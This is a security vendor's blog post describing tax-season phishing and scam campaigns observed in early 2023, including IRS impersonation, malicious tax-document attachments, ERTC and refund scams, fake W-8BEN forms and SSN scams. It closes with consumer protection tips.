2023 Tax Scam Emails Exposed: Unmasking Deceptive Trends

Tax season is a busy time of year for taxpayers and threat actors. Consumers and businesses focus on filing their taxes and getting excited over possible refunds, while cybercriminals roll out both their tried-and-true tax scams along with implementing new efforts. However, tax time can also be quite stressful with consumers and those charged with handling an organization’s tax filings hyper aware of any notifications from the government that might impact their filing or refund.

Threat actors know and utilize this fear, so to help prepare everyone, Trustwave SpiderLabs will break down some of the most common tax season trends and scams the team has observed during the first quarter of 2023 and provide tips on how to stay safe during this time of year.

HTML Extensions Dominate Tax Season Email Scams

According to our data, since the start of this year, the top two file extensions used in tax season email scams are .htm and .html, accounting for 62% of all attachments. HTML is often used in scam emails because it allows cybercriminals to create realistic looking web pages with diverse content. Using HTML makes it easier for cybercriminals to lure people into opening malicious emails. It is important to be cautious, as HTML attachments can spread harmful software or send users to fake websites where they might be asked to share sensitive information.

Figure 1. Pie chart of attachment extensions used in Tax-themed scams since Jan 01, 2023.

Navigating Tax Season Safely: 5 Common Scams to Watch Out For

As tax season is in full swing, one must remain cautious and aware of potential phishing and scams as they come into your inbox. To assist with this, Trustwave SpiderLabs has compiled a list of the most prevalent tax scams this season. These insights were created based on data collected through Trustwave's spam traps and various monitoring systems.

1. IRS Impersonation Scams

U.S. IRS impersonation scams see fraudsters pose as the tax agency to manipulate victims into divulging sensitive personal and financial information. Fraudsters often use fear of prosecution for breaking the law or the promise of monetary gain to deceive unsuspecting taxpayers.

SpiderLabs recently spotted a phishing email, shown below, impersonating the Internal Revenue Service (IRS) and offering the stunning amount of $16.5 million in approved funds if the target gives the information required. The email requests personal information such as name, address, phone number, occupation, and ID card to be sent back over email. This message preys on the recipient's desire for financial gain by hoping that they will ignore the warning signs, which include the email being very poorly worded, and give away their sensitive data.

Figure 2. Screenshot of the email impersonating the IRS with subject line reading ‘Internal Revenue Service.’

In the example below, we present another instance of a phishing attempt that falsely claims to be from ‘ShareFile’ on behalf of the IRS. The email requests the user to review the attached HTML document.

Figure 3. Email with subject line ‘Internal Revenue: Review Document (redacted@redacted.com)’ impersonates the IRS.

The attachment directs users to a counterfeit ‘ShareFile’ login page, where victims input email credentials and additional sensitive data like mother's maiden name, social security number, and date of birth. This information can be exploited for identity theft, financial fraud, and unauthorized account access, or sold to cybercriminals on the dark web.

Figure 4. Screenshot of the HTML file named ‘TaxProfile(IRS).html’ asking for sensitive information.

Another method is for scammers to impersonate IRS officials.

2. Malware Delivered Through Tax Documents

A recent tax-related email campaign SpiderLabs observed involved an attacker sending an email including a .docx file called ‘W2-2022.docx,’ claiming to have important tax details for the recipient to review. However, what in fact happens is that upon opening this file the user is connected to a harmful website that leads to infostealer malware installation.

Infostealer malware is used by cybercriminals to snatch sensitive data like usernames, passwords, and financial information. It operates by logging keystrokes, capturing screenshots, and tracking a user’s Internet activities, as well as gathering data from email accounts, web browsers, and other applications.

Figure 5. ‘W2-2022’ email subject with ‘W2-2022.docx’ attachment delivers info-stealing malware.

3. Tax Refund Scams

Tax refund scams are successful because many individuals anticipate refunds from the IRS.
A recent Facebook-themed phishing scam surfaced that alleges the recipient is under investigation for tax evasion and the email requests account verification for tax refund processing. Users are prompted to click an email URL using the ‘m.me’ domain, which is owned by Meta (formerly Facebook Inc.) and directs users to Messenger pages or conversations. What in fact happens is the user is led into a trap, where they are asked to give personal information, login credentials, or even financial details.

Figure 6. ‘Message from Facebook’ email uses Tax Refund and Tax Evasion as themes.

Another common tax refund-themed scam involves the Employee Retention Tax Credit (ERTC), a legitimate government tax credit designed to help businesses cover payroll costs and retain employees.

Scammers send spam emails promising businesses up to $26,000 per employee through the ERTC program. The emails ask owners to fill out a form on a suspicious website or call a phone number. Here's an example of such a scam message.

Figure 7. ERTC scam with subject line of ‘Small Business owners are owed $ 26,000 Per Employee.’

When the user clicks on the email link, they will be taken to the website as shown below and then prompted to supply financial information. These scammers may use the information provided to steal sensitive data.

Figure 8. The screenshot of the ertcmoneyforyou[.]com webpage.

4. Phishing via Fake Tax Forms

Scammers are known to stick with a method that still works, so many scams still use fake tax forms to trick people. Form W-8BEN, which is typically used to establish foreign status for tax purposes, is one of the most common forms attackers use.

Threat actors using this scam employ the old school approach of sending a letter by mail or faxing the victim. As shown in the example below, the notification claims the victim is exempt from paying taxes, but still must authenticate their information by filling out the fake W-8BEN form. The victim is urged to fax the completed form back to the fake IRS number which is controlled by the scammer.

Figure 9. Phishing email using fake tax form with subject line ‘MID YEAR-NON-RESIDENT ALIEN TAX EXEMPTION UPDATE.’

Figure 10. The fake W-8BEN tax form that includes a Fake IRS fax number.

5. Social Security Number Scams

This type of scam, where fraudsters impersonate the Social Security Administration (SSA) and claim that the recipient's Social Security Number (SSN) has been terminated due to illegal activity, is designed to exploit fear and confusion. The goal of the scammers is to obtain personal information, such as SSNs, bank account details, or other sensitive data, which can then be used for identity theft or financial fraud.

Commonly, as can be seen in the email below, scammers send a document with a message that urges the victim to call a fake customer support line to resolve the issue. If the victim calls, they may be asked to provide personal information that can be used for identity theft or financial fraud.

Figure 11. Email Screenshot with subject line of ‘SSN terminated due to suspicious activity.’

Figure 12. The attached PDF document claims the recipient's SSN account is terminated and directs them to call a fake support number for assistance.

How to Protect Against Tax Season Scams:

• Be cautious and verify: Avoid opening unsolicited emails and then double-check the sender's address. Confirm information through official channels like organization websites or direct calls. For instance, if you receive a suspicious email that appears to be from the IRS, visit the official IRS website or call their helpline to verify its legitimacy.
• Practice safe clicking: Refrain from clicking links or downloading attachments in suspicious emails to prevent exposure to malware or viruses. Before clicking a link, hover your cursor over it to reveal the actual URL. This can help you identify if the link leads to a suspicious or unrelated website, which may be an indicator of a phishing attempt.
• Recognize and resist urgency: Exercise caution when receiving urgent requests, as scammers often use them to pressure victims into taking impulsive actions without proper consideration. Be skeptical of emails demanding immediate action or threatening consequences.
• Safeguard personal information: Avoid sharing personal data, such as bank details or Social Security numbers, via email, phone, or other channels unless you're sure the communication is legitimate. Verify the requester's identity before providing information. Regularly monitor credit reports and financial statements for signs of fraud.
• Use secure tax filing methods: When e-filing taxes, pick a reliable tax preparation service. Check their reputation, read reviews, and ensure they have a history of safeguarding client data. Established services generally have strong security measures to protect sensitive information.
• Stay educated and updated: Stay informed about the latest phishing and social engineering techniques. Keep your operating system, antivirus, anti-malware and other application software up to date to ensure that your system is protected against the latest threats.
• Report suspected scams: If you encounter a tax season scam or believe you have been victimized by one, report the incident to appropriate authorities to help prevent others from falling prey to similar schemes.

Don't let tax season cyber threats catch you off guard. Tax-related scams and cyberattacks are a constant danger, with cybercriminals adapting their tactics to target individuals and businesses alike. By staying informed, being cautious, and following online security best practices, you can minimize the risk of falling victim to these scams.

Stay aware and stay safe during tax season!